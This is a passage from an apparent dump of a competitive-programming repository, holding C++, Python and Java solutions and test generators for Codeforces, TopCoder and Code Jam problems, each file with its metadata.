oddRight / 2, oddRight);\n writeln(ans + odd + oddLeft + oddRight);\n}\n\n//{{{\nint main()\n{\n ios_base::sync_with_stdio(false);\n ints(t); fori(t) run();\n cerr << fixed << setprecision(0) << \"Execution time = \" << 1000.0 * clock() / CLOCKS_PER_SEC << \"ms\\n\";\n return 0;\n}\n\n#define a _a\n#define n _n\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a);\ntemplate<typename T,typename D=decltype(*begin(declval<T>())),typename enable_if<!is_same<T,basic_string<char>>::value>::type* =nullptr>\nostream&operator<<(ostream&os,T const&a){auto it=begin(a);if(it!=end(a))os<<*it++;while(it!=end(a))os<<\"\\n \"[is_fundamental<typename T::value_type>::value]<<*it++;return os;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a){return os<<a.first<<\" \"<<a.second;}\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttti istream&operator>>(istream&is,vector<T>&a){fori(a.size())is>>a[i];return 
is;}\nttti void print(T&&a){cout<<\" \"<<a;}\nttti void priws(T&&a){cout<<a;}\nttti void read(T&a){cin>>a;} //}}}\n" }, { "alpha_fraction": 0.510948896408081, "alphanum_fraction": 0.5474452376365662, "avg_line_length": 16, "blob_id": "0f2fc6262d17dee9e5c2a86d17d6efcf035d0664", "content_id": "ac5db5b493b9227b61ad4576d49e5a52a7adff1d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 137, "license_type": "no_license", "max_line_length": 32, "num_lines": 8, "path": "/scripts/A+B/A+B_WA2.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import random\n\na, b = map(int, input().split())\nprint(a + b)\nif random.randint(0, 10) == 0:\n print(a - b + 1)\nelse:\n print(a - b)\n\n" }, { "alpha_fraction": 0.47012898325920105, "alphanum_fraction": 0.4881194829940796, "avg_line_length": 26.532711029052734, "blob_id": "adca6fc580a853ca19a44ed4851659f636d047b8", "content_id": "f4312027f884e67c6f2ec2248f693d924cc8daf1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 5892, "license_type": "no_license", "max_line_length": 174, "num_lines": 214, "path": "/CodeForce/1744/E1.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. 
C++17 version, modified 18 march 2020 (writeln<tuple>, whole->all) {{{\n#include <bits/stdc++.h>\n#ifdef ONLINE_JUDGE\n#pragma GCC target(\"avx2,bmi,bmi2,lzcnt,popcnt\")\n#endif\n\nusing namespace std;\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n#define SZ(a) int(size(a))\n\ntypedef pair<int, int> pii;\ntypedef vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define all(a) begin(a), end(a)\n#define ints(a...) int a; readln(a)\n\n[[maybe_unused]] const int MOD = 1000000007;\n[[maybe_unused]] const int INTMAX = numeric_limits<int>::max();\n\n#define ttt12i template<class T1, class T2> inline\n#define ttti template<class T> inline\n\nvoid writeln(){cout<<\"\\n\";}ttti void print(T&& a);ttti void priws(T&& a);ttti void read(T& a);\ntemplate<class... Args> inline void readln(Args&... args){(read(args),...);}\ntemplate<class H, class...T> inline void writeln(H&& h,T&&...t){priws(h);(print(t),...);writeln();}\n\n//Igorjan\n//binSearch\n//x \\in [l, r]-> min, f(x) == true\ntemplate<typename T, typename F>\nT binSearch(T l, T r, F f, T eps = 1)\n{\n T m;\n while (abs(r - l) > eps)\n m = l + (r - l) / 2,\n (f(m) ? r : l) = m;\n return f(l) ? 
l : r;\n}\n\n//sieve\nvector<bool> sieve(int n)\n{\n vector<bool> x(n, true);\n x[0] = x[1] = false;\n for (int i = 2; i < n; i++)\n if (x[i])\n for (int j = i * 2; j < n; j += i)\n x[j] = false;\n return x;\n}\n\n//linearSieve\nstruct linearSieve\n{\n vector<int> primes;\n vector<int> mobius;\n vector<int> minPrime, prev;\n\n linearSieve(int N)\n {\n minPrime.resize(N, 0);\n prev.resize(N, 0);\n mobius.resize(N, 0);\n mobius[1] = 1;\n for (int i = 2; i < N; i++)\n {\n if (minPrime[i] == 0)\n mobius[i] = -1,\n primes.push_back(i),\n minPrime[i] = i;\n for (int prime : primes)\n {\n int temp = prime * i;\n if (temp < N && prime <= minPrime[i])\n minPrime[temp] = prime,\n mobius[temp] = minPrime[i] == prime ? 0 : -mobius[i],\n prev[temp] = i;\n else\n break;\n }\n }\n }\n\n vector<pair<int, int>> foldedFactorization(int x)\n {\n vector<pair<int, int>> temp;\n int p = -1;\n int pp = -1;\n while (x > 1)\n {\n pp = p;\n p = minPrime[x];\n if (p != pp)\n temp.pb({p, 1});\n else\n temp.back().second++;\n x = prev[x];\n }\n return temp;\n }\n\n vector<int> divisors(int x, bool nonTrivial = true)\n {\n vector<int> ans;\n\n const vector<pair<int, int>>& fold = foldedFactorization(x);\n function<void(int, int)> gen = [&](int v, int j) {\n if (j == int(fold.size()))\n {\n if (!nonTrivial || (v != 1 && v != x))\n ans.pb(v);\n return;\n }\n gen(v, j + 1);\n fori(fold[j].second)\n gen(v *= fold[j].first, j + 1);\n };\n gen(1, 0);\n\n return ans;\n }\n\n vector<int> sortedDivisors(int x, bool nonTrivial = true)\n {\n vector<int> ans = divisors(x, nonTrivial);\n sort(ans.begin(), ans.end());\n return ans;\n }\n\n vector<int> factorization(int x)\n {\n vector<int> temp;\n while (x > 1)\n temp.push_back(minPrime[x]),\n x = prev[x];\n return temp;\n }\n\n map<int, int> mapFactorization(int x)\n {\n map<int, int> m;\n while (x > 1)\n ++m[minPrime[x]],\n x = prev[x];\n return m;\n }\n\n bool isPrime(int x)\n {\n return minPrime[x] == x;\n }\n};\n\n//}}}\n\nvoid run()\n{\n ints(a, b, c, 
d);\n auto s = linearSieve(100010);\n auto fa = s.mapFactorization(a);\n auto fb = s.mapFactorization(b);\n for (auto& [k, v]: fb)\n fa[k] += v;\n for (int x = a + 1; x <= c; ++x)\n {\n auto fx = s.mapFactorization(x);\n auto fy(fa);\n ll y = 1;\n for (auto& [k, v]: fx)\n fy[k] -= v;\n\n for (auto& [k, v]: fy)\n forj(v)\n y *= k;\n if (y > d)\n continue;\n auto yy = y * binSearch(1ll, 1000000001ll, [&](ll mul) {\n return y * mul > b;\n });\n if (yy > b && yy <= d)\n return writeln(x, yy);\n }\n writeln(-1, -1);\n}\n\n//{{{\nint main()\n{\n ios_base::sync_with_stdio(false); cin.tie(0);\n ints(t); fori(t) run();\n cerr << fixed << setprecision(0) << \"Execution time = \" << 1000.0 * clock() / CLOCKS_PER_SEC << \"ms\\n\";\n return 0;\n}\n\n#define a _a\n#define n _n\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a);\ntemplate<typename T,typename D=decltype(*begin(declval<T>())),typename enable_if<!is_same<T,basic_string<char>>::value>::type* =nullptr>\nostream&operator<<(ostream&os,T const&a){auto it=begin(a);if(it!=end(a))os<<*it++;while(it!=end(a))os<<\"\\n \"[is_fundamental<typename T::value_type>::value]<<*it++;return os;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a){return os<<a.first<<\" \"<<a.second;}\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttti istream&operator>>(istream&is,vector<T>&a){fori(a.size())is>>a[i];return is;}\nttti void print(T&&a){cout<<\" \"<<a;}\nttti void priws(T&&a){cout<<a;}\nttti void read(T&a){cin>>a;} //}}}\n" }, { "alpha_fraction": 0.30790191888809204, "alphanum_fraction": 0.3419618606567383, "avg_line_length": 17.83333396911621, "blob_id": "91b874e87241f8eec87104638de8942b105a4e88", "content_id": "093ffd303e5dcd929bd9fdd4d8c0e98b42911c24", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1468, "license_type": "no_license", "max_line_length": 44, "num_lines": 78, "path": 
"/trains/neerc/neerc.ifmo.ru.train.2014.10.14/J.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <iostream>\n#include <stack>\n#include <cstdio>\n#include <vector>\n#include <algorithm>\n \nusing namespace std;\n \nlong long res = 0, ost = 0;\n \nint inf = 1e+9 + 9;\n \nint pow (int x, int k){\n long long res = 1;\n for (int i = 0; i < k; ++i){\n res *= x;\n if (res >= inf)\n return inf;\n }\n int c = res;\n return c;\n}\n \nint next(int x, int k){\n int l = 1;\n int r = x + 1;\n int m = (l + r) / 2;\n while (r > l + 1){\n m = (r + l) / 2;\n if (pow(m, k) > x)\n r = m;\n else\n l = m;\n }\n res = l;\n}\n \nint sz[100500];\nint dp[100500];\nint ans[100500];\n \n \nint n;\nint main(){\n freopen(\"cube.in\", \"r\", stdin);\n freopen(\"cube.out\", \"w\", stdout);\n cin >> n;\n for (int k = 2; k <= 10; ++k){\n sz[0] = 0;\n dp[0] = 0;\n ans[0] = 0;\n sz[1] = 1;\n dp[1] = 1;\n ans[1] = 1;\n \n for (int i = 2; i <= n; ++i){\n sz[i] = inf;\n int cr = next(i, k);\n for (int j = 1; j <= cr; ++j){\n int gg = pow(j, k);\n if (sz[i - gg] + 1 < sz[i]){\n sz[i] = sz[i - gg] + 1;\n dp[i] = i - gg;\n ans[i] = j;\n }\n }\n }\n \n cout << sz[n] << \" \";\n int q = n;\n for (int i = 0; i < sz[n]; ++i){\n cout << ans[q] << \" \";\n q = dp[q];\n }\n cout << endl;\n \n }\n}" }, { "alpha_fraction": 0.31166666746139526, "alphanum_fraction": 0.3683333396911621, "avg_line_length": 16.617647171020508, "blob_id": "97108c8a86c52223a353fd8fec838c631e0ee665", "content_id": "347a5d99dd3209cbec4b6b7d299c3e2a16cc8675", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 600, "license_type": "no_license", "max_line_length": 50, "num_lines": 34, "path": "/CodeForce/0952/E.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "n = int(input())\n\nsoft = 0\nhard = 0\n\nfor i in range(n):\n _, t = input().split()\n if t == 'soft':\n soft += 1\n else:\n hard += 1\n\nfor i in range(1, 100):\n # field1 = [[0] * i 
for j in range(i)]\n # field2 = [[0] * i for j in range(i)]\n\n s1 = soft\n h1 = hard\n\n s2 = soft\n h2 = hard\n\n for j in range(i):\n for k in range(i):\n if (j + k) % 2 == 0:\n s1 -= 1\n h2 -= 1\n else:\n s2 -= 1\n h1 -= 1\n\n if s1 <= 0 and h1 <= 0 or s2 <= 0 and h2 <= 0:\n print(i)\n break\n\n" }, { "alpha_fraction": 0.442945271730423, "alphanum_fraction": 0.45952197909355164, "avg_line_length": 33.818790435791016, "blob_id": "26d1d52f15dff9f422d1eab0e647e1e228f35ce3", "content_id": "3302edfdb693d2ffb83309f8bc91e34169512ab7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 5188, "license_type": "no_license", "max_line_length": 174, "num_lines": 149, "path": "/2020/gcj1B/C.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. C++17 version, modified 18 march 2020 (writeln<tuple>, whole->all) {{{\n#include <bits/stdc++.h>\n\nusing namespace std;\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n#define SZ(a) int(a.size())\n\ntypedef pair<short, short> pii;\ntypedef vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define all(a) begin(a), end(a)\n#define ints(a...) int a; readln(a)\n\n[[maybe_unused]] const int MOD = 1000000007;\n[[maybe_unused]] const int INTMAX = numeric_limits<int>::max();\n\n#define ttt12i template<class T1, class T2> inline\n#define ttti template<class T> inline\n\nvoid writeln(){cout<<\"\\n\";}ttti void print(T&& a);ttti void priws(T&& a);ttti void read(T& a);\ntemplate<class... Args> inline void readln(Args&... 
args){(read(args),...);}\ntemplate<class H, class...T> inline void writeln(H&& h,T&&...t){priws(h);(print(t),...);writeln();}\n\n//Igorjan\n//printTuple\ntemplate<class Tuple, size_t... Is> ostream& print_tuple(ostream& os, const Tuple& t, index_sequence<Is...>) { ((os << (Is == 0 ? \"\" : \" \") << get<Is>(t)), ...); return os; }\ntemplate<class Tuple, size_t... Is> istream& read_tuple(istream& is, Tuple& t, index_sequence<Is...>) { ((is >> get<Is>(t)), ...); return is; }\ntemplate<class... Args> inline ostream& operator<<(ostream& os, const tuple<Args...>& t) { return print_tuple(os, t, index_sequence_for<Args...>{}); }\ntemplate<class... Args> inline istream& operator>>(istream& is, tuple<Args...>& t) { return read_tuple(is, t, index_sequence_for<Args...>{}); }\n\n//}}}\n\nvector<pii> run()\n{\n ints(r, s);\n int n = r * s;\n vector<pii> a;\n if (r == 2)\n {\n for (int i = 2; i < n; i += 2)\n a.pb({i, 1});\n return a;\n }\n if (s == 2)\n {\n if (r % 2 == 1)\n {\n a.pb({1, r - 1});\n for (int i = r; i < n - 2; i += 2)\n a.pb({2, i});\n }\n else\n {\n for (int i = r - 1; i < n - 2; i += 2)\n a.pb({2, i});\n }\n return a;\n }\n fori(n)\n a.pb({i % r, i % s});\n\n auto isCorrect = [&](const vector<pii>& x) {\n fori1(n)\n if (x[i].first < x[i - 1].first)\n return false;\n return true;\n };\n vector<tuple<int, vector<pii>, vector<pii>>> states = {{0, a, {}}}, nn;\n while (true)\n {\n nn.clear();\n for (auto& state: states)\n {\n int s = get<0>(state);\n auto moves = get<2>(state);\n auto x = get<1>(state);\n if (isCorrect(x))\n return moves;\n if (s == 0)\n for (int a = 1; a < n; ++a)\n for (int b = 1; a + b < n; ++b)\n {\n moves.pb({a, b});\n vector<pii> y;\n fori(b)\n y.pb(x[a + i]);\n fori(a)\n y.pb(x[i]);\n fori(n - a - b)\n y.pb(x[a + b + i]);\n nn.pb({a + b + 2, y, moves});\n moves.pop_back();\n }\n else\n for (int a = 1; a < min(n, s); ++a)\n {\n int b = min(n, s) - a;\n moves.pb({a, b});\n vector<pii> y;\n fori(b)\n y.pb(x[a + i]);\n fori(a)\n y.pb(x[i]);\n 
fori(n - a - b)\n y.pb(x[a + b + i]);\n nn.pb({a + b + 2, y, moves});\n moves.pop_back();\n }\n }\n states = nn;\n }\n}\n\n//{{{\nint main()\n{\n ios_base::sync_with_stdio(false);\n ints(t);\n fori(t)\n {\n cout << \"Case #\" << (i + 1) << \": \";\n auto v = run();\n writeln(SZ(v));\n writeln(v);\n }\n cerr << fixed << setprecision(0) << \"Execution time = \" << 1000.0 * clock() / CLOCKS_PER_SEC << \"ms\\n\";\n return 0;\n}\n\n#define a _a\n#define n _n\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a);\ntemplate<typename T,typename D=decltype(*begin(declval<T>())),typename enable_if<!is_same<T,basic_string<char>>::value>::type* =nullptr>\nostream&operator<<(ostream&os,T const&a){auto it=begin(a);if(it!=end(a))os<<*it++;while(it!=end(a))os<<\"\\n \"[is_fundamental<typename T::value_type>::value]<<*it++;return os;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a){return os<<a.first<<\" \"<<a.second;}\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttti istream&operator>>(istream&is,vector<T>&a){fori(a.size())is>>a[i];return is;}\nttti void print(T&&a){cout<<\" \"<<a;}\nttti void priws(T&&a){cout<<a;}\nttti void read(T&a){cin>>a;} //}}}\n" }, { "alpha_fraction": 0.4926566183567047, "alphanum_fraction": 0.5088306665420532, "avg_line_length": 30.403614044189453, "blob_id": "5de528146b839549fec5475c7b833ca69151bfda", "content_id": "7121f1720c6522af82d8dce9f913377d81cbf700", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 5379, "license_type": "no_license", "max_line_length": 165, "num_lines": 166, "path": "/CodeForce/0672/C.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 19 March 2015 (deleted unused defines & reorganization from 05 November 2015)\r\n#include <bits/stdc++.h>\r\n\r\nusing namespace std;\r\n\r\n#define forit(it, r) for (auto it = r.begin(); it != r.end(); ++it)\r\n#define FOR(i, m, n) for 
(int i = m; i < (int) (n); ++i)\r\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\r\n#define forn1(i, n) for (int i = 1; i < (int) (n); ++i)\r\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\r\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\r\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\r\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\r\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\r\n\r\n#define ll long long\r\n#define pb push_back\r\n#define vi vector<int>\r\n#define pii pair<int, int>\r\n#define vll vector<long long>\r\n#define pll pair<long long, long long>\r\n#define whole(a) a.begin(), a.end()\r\n#define next next__\r\n#define prev prev__\r\n#define count count__\r\n#define argmax(a) (max_element(whole(a)) - (a).begin())\r\n\r\n#define ints(a...) int a; readln(a)\r\n#define lls(a...) ll a; readln(a)\r\n#define wr(args...) err(split(#args,',').begin(),args)\r\n \r\n#define FILENAME \"input\"\r\n#define INF 1000000007\r\n \r\n#define tthti template<typename Head, typename... Tail> inline\r\n#define ttt12i template<typename T1, typename T2> inline\r\n#define ttti template<typename T> inline\r\n\r\ninline void writeln2(){cout<<\"\\n\";}\r\ninline void writeln() {cout<<\"\\n\";}\r\ninline void readln() {}\r\nttti void read(T&);\r\nttti void priws(T);\r\nttti void print(T);\r\n\r\nvoid err(vector<string>::iterator it){++it;}\r\ntthti void readln (Head& head,Tail&... tail){read(head); readln (tail...);}\r\ntthti void writeln2(Head head, Tail... tail){print(head);writeln2(tail...);}\r\ntthti void writeln (Head head, Tail... 
tail){priws(head);writeln2(tail...);}\r\nttti void writeln_range(T f,T s){if(f!=s)for(auto i=f;i!=s;++i)writeln(*i);}\r\ntthti void err(vector<string>::iterator it,Head head,Tail...tail){writeln((*it).substr((*it)[0]==' '),\"=\",head);err(++it, tail...);}\r\nvector<string>split(const string&s,char c){vector<string>v;stringstream ss(s);string x;while(getline(ss,x,c))v.pb(x);return move(v);}\r\n\r\n///-------------------------------------------------------------------------------------------------------------------------------------\r\n//Igorjan\r\n\r\n#define point pair<long double, long double>\r\n\r\nvoid run()\r\n{\r\n ints(ax, ay, bx, by, tx, ty, n);\r\n\tvector<point> a(n);\r\n vector<long double> dists(n, 0.0), as(n, 0.0), bs(n, 0.0);\r\n\treadln(a);\r\n auto dist = [&](point x, long double tx, long double ty) {\r\n return sqrt((x.first - tx) * (x.first - tx) + (x.second - ty) * (x.second - ty));\r\n };\r\n auto argmin = [&](vector<long double>& a) {\r\n auto mn = numeric_limits<long double>::max();\r\n int index = -1;\r\n fori(a.size())\r\n //if (a[i] < dists[i])\r\n if (a[i] - dists[i] < mn)\r\n index = i,\r\n mn = a[i] - dists[i];\r\n return index;\r\n };\r\n if (a.size() == 1)\r\n {\r\n cout.precision(15);\r\n cout << fixed << dist(a[0], tx, ty) + min(dist(a[0], ax, ay), dist(a[0], bx, by)) << \"\\n\";;\r\n return;\r\n }\r\n fori(n)\r\n dists[i] = dist(a[i], tx, ty),\r\n as[i] = dist(a[i], ax, ay),\r\n bs[i] = dist(a[i], bx, by);\r\n long double ans = accumulate(whole(dists), 0.0) * 2; \r\n\r\n int ma = argmin(as);\r\n int mb = argmin(bs);\r\n long double da = as[ma] - dists[ma];\r\n long double db = bs[mb] - dists[mb];\r\n\r\n if (ma != mb)\r\n {\r\n if (da <= 0)\r\n ans += da;\r\n if (db <= 0)\r\n ans += db;\r\n if (da >= 0 && db >= 0)\r\n ans += min(da, db);\r\n }\r\n else\r\n {\r\n int m = ma;\r\n dists.erase(dists.begin() + m);\r\n as.erase(as.begin() + m);\r\n bs.erase(bs.begin() + m);\r\n ma = argmin(as);\r\n mb = argmin(bs);\r\n long double da2 = 
as[ma] - dists[ma];\r\n long double db2 = bs[mb] - dists[mb];\r\n ans += min(da + (db2 >= 0 ? 0 : db2), db + (da2 >= 0 ? 0 : da2));\r\n }\r\n cout.precision(15);\r\n cout << fixed << ans << \"\\n\";\r\n}\r\n\r\nint main()\r\n{\r\n#ifndef ONLINE_JUDGE\r\n double time = clock();\r\n#endif\r\n ios_base::sync_with_stdio(false);\r\n// freopen(FILENAME\".in\", \"r\", stdin);\r\n// freopen(FILENAME\".out\", \"w\", stdout);\r\n run();\r\n#ifndef ONLINE_JUDGE\r\n writeln(\"execution time =\", (clock() - time) / CLOCKS_PER_SEC);\r\n#endif\r\n return 0;\r\n}\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n#define a _a\r\n#define n _n\r\nttti ostream&operator<<(ostream&os,vector<T>&a);\r\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\r\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>&a){return os<<a.first<<\" \"<<a.second;}\r\nttti ostream&operator<<(ostream&os,vector<T>&a){if(a.size())os<<a[0];else os<<\"\\n\";for(int i=1;i<a.size();++i)os<<\"\\n \"[is_fundamental<T>::value]<<a[i];return os;}\r\nttti istream&operator>>(istream&is,vector<T>&a){if(a.size()==0){int n;is>>n;a.resize(n);}for(int i=0;i<a.size();++i)is>>a[i];return is;}\r\nttti void print(T a){cout<<\" \"<<a;}\r\nttti void priws(T a){cout<<a;}\r\nttti void read(T& a){cin>>a;}\r\n" }, { "alpha_fraction": 0.3723554313182831, "alphanum_fraction": 0.38928067684173584, "avg_line_length": 26.623376846313477, "blob_id": "34f4633b01eafe70baa47459de1b31b17174feb5", "content_id": "b8860162735313a3cdc12f5e82f82fbf91ba5ced", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2127, "license_type": "no_license", "max_line_length": 82, "num_lines": 77, "path": "/TopCoder/TC652/C.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "//template igorjan94 version from 05 December 2014\n#include <bits/stdc++.h>\n\n#define fori(n) for (int i = 0; i < n; ++i)\n#define forj(n) for (int j 
= 0; j < n; ++j)\n\n#define fst first\n#define cnd second\n#define pb push_back\n#define ll long long\n#define vi vector<int>\n#define pii pair<int, int>\n#define vll vector<long long>\n#define vvi vector<vector<int> >\n#define pll pair<long long, long long>\n#define whole(a) a.begin(), a.end()\n\nusing namespace std;\n\n#define method vector <int> findPath(vector <int> x, vector <int> y)\n#define classname NoRightTurnDiv2\n\nbool ori(int x1, int y1, int x2, int y2, int x3, int y3)\n{\n return (x2 * y3 - x3 * y2 - x1 * y3 + x3 * y1 + x1 * y2 - x2 * y1) > 0;\n}\n\nclass classname\n{\n public :\n method\n {\n int n = x.size();\n vector<bool> used(n, false);\n vector<int> ans;\n pair<int, int> mn = {x[0], y[0]};\n int cur = 0;\n fori(n)\n if (i)\n if (mn > make_pair(x[i], y[i]))\n mn = {x[i], y[i]},\n cur = i;\n used[cur] = true;\n ans.push_back(cur);\n for (int i = 1; i < n; i++)\n {\n for (int j = 0; j < n; j++)\n if (!used[j])\n {\n bool ok = true;\n for (int k = 0; k < n; k++)\n if (!used[k] && k != j)\n ok &= ori(x[cur], y[cur], x[j], y[j], x[k], y[k]);\n if (ok)\n {\n cur = j;\n ans.push_back(cur);\n used[cur] = true;\n break;\n }\n }\n }\n return ans;\n }\n};\n\n#ifndef ONLINE_JUDGE\n#include \"../../writeln.h\"\n\nint main()\n{\n classname x;\n vector<int> a, b;\n readln(a, b);\n writeln(x.findPath(a, b));\n}\n#endif\n" }, { "alpha_fraction": 0.3362068831920624, "alphanum_fraction": 0.5431034564971924, "avg_line_length": 15.571428298950195, "blob_id": "1b5629c655503fee19a74a1e79a9abc6b5e4457c", "content_id": "dd41f42893ff2730719e5dfcd8c802a6b035a669", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 116, "license_type": "no_license", "max_line_length": 23, "num_lines": 7, "path": "/CodeForce/0750/gen.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "n = 10000000 // 50 - 17\nprint(n)\nprint(\"-1 2\")\nprint(\"98 2\")\nprint(\"6 1\")\nfor i in range(n - 3):\n print(\"100 1\")\n" }, { 
"alpha_fraction": 0.32311320304870605, "alphanum_fraction": 0.3891509473323822, "avg_line_length": 17.434782028198242, "blob_id": "8cb763c4f5f0e34661e3ea96b3acc81e95ecd814", "content_id": "66ee96287518803e381c73889ebb579d923ab2f1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 424, "license_type": "no_license", "max_line_length": 60, "num_lines": 23, "path": "/trains/train2015western/I.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import sys\nimport math\nr = int(input())\nR = r ** 2\nans = -1\nINF = 10 ** 9 + 2015\nprev = 0\nx = 0\nfor y in range(r - 1, 0, -1):\n Y = y ** 2\n while x ** 2 + Y <= R:\n x += 1\n t = y + 2 * Y\n x -= 1\n dx = x - prev\n if ans == -1:\n ans = (x * (2 * x + 1) * t) % INF\n elif dx > 0:\n ans = (ans + dx * (2 * dx + 1 + prev * 4) * t) % INF\n prev = x\nif ans == -1:\n ans = 0\nprint(ans % INF)\n" }, { "alpha_fraction": 0.5691056847572327, "alphanum_fraction": 0.5691056847572327, "avg_line_length": 23.200000762939453, "blob_id": "de7e8f407b901d74f16fc0b1f2fd9b0b21e0ab53", "content_id": "c5d53b5b5b39fd16f9a9cd5c4e57d1b40c13eac9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 123, "license_type": "no_license", "max_line_length": 45, "num_lines": 5, "path": "/trash/jv/X.java", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "public class X extends TemplateImpl<String> {\n void good(String s) {\n System.out.println(\"::X, \" + s);\n }\n}\n\n\n" }, { "alpha_fraction": 0.4233971834182739, "alphanum_fraction": 0.4554537832736969, "avg_line_length": 34.32352828979492, "blob_id": "a9bf760974b4bc4004df1e06159de55c4b0c756a", "content_id": "0bd67abe7a70ec60edba42d2ee631a82d16a3f76", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2402, "license_type": "no_license", "max_line_length": 928, "num_lines": 68, "path": "/CodeForce/0291/C.cpp", 
"repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <cstdlib>\n#include <iostream>\n#include <stdio.h>\n#include <vector>\n#include <set>\n#include <algorithm>\n#define enter printf(\"\\n\");\n\nusing namespace std;\nint INF = 1000000007;\nconst int pos[] = {128, 192, 224, 240, 248, 252, 254, 255};\nint a[100001][4], ans[4];\nvoid writeln(int a){printf(\"%d\\n\", a);}void writeln(int a, int b){printf(\"%d %d\\n\", a, b);}void writeln(int a, int b, int c){printf(\"%d %d %d\\n\", a, b, c);}void writeln(int a, int b, int c, int d){printf(\"%d %d %d %d\\n\", a, b, c, d);}void write(int a){printf(\"%d\", a);}void write(int a, int b){printf(\"%d %d\", a, b);}void write(int a, int b, int c){printf(\"%d %d %d\", a, b, c);}void write(int a, int b, int c, int d){printf(\"%d %d %d %d\", a, b, c, d);}void read(int &a){scanf(\"%d\", &a);}void read(int &a, int &b){scanf(\"%d %d\", &a, &b);}void read(int &a, int &b, int &c){scanf(\"%d %d %d\", &a, &b, &c);}void read(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\", &a, &b, &c, &d);}void readln(int &a){scanf(\"%d\\n\", &a);}void readln(int &a, int &b){scanf(\"%d %d\\n\", &a, &b);}void readln(int &a, int &b, int &c){scanf(\"%d %d %d\\n\", &a, &b, &c);}void readln(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\\n\", &a, &b, &c, &d);}\n\nvoid readln(vector<int> &f, int n)\n{\n int x;\n for (int i = 1; i <= n; i++)\n {\n read(x);\n f.push_back(x);\n }\n}\n\nvoid writeln(vector<int> &f)\n{\n int x;\n for (int i = 0; i < f.size(); i++)\n printf(\"%d%c\", f[i], i == f.size() - 1 ? 
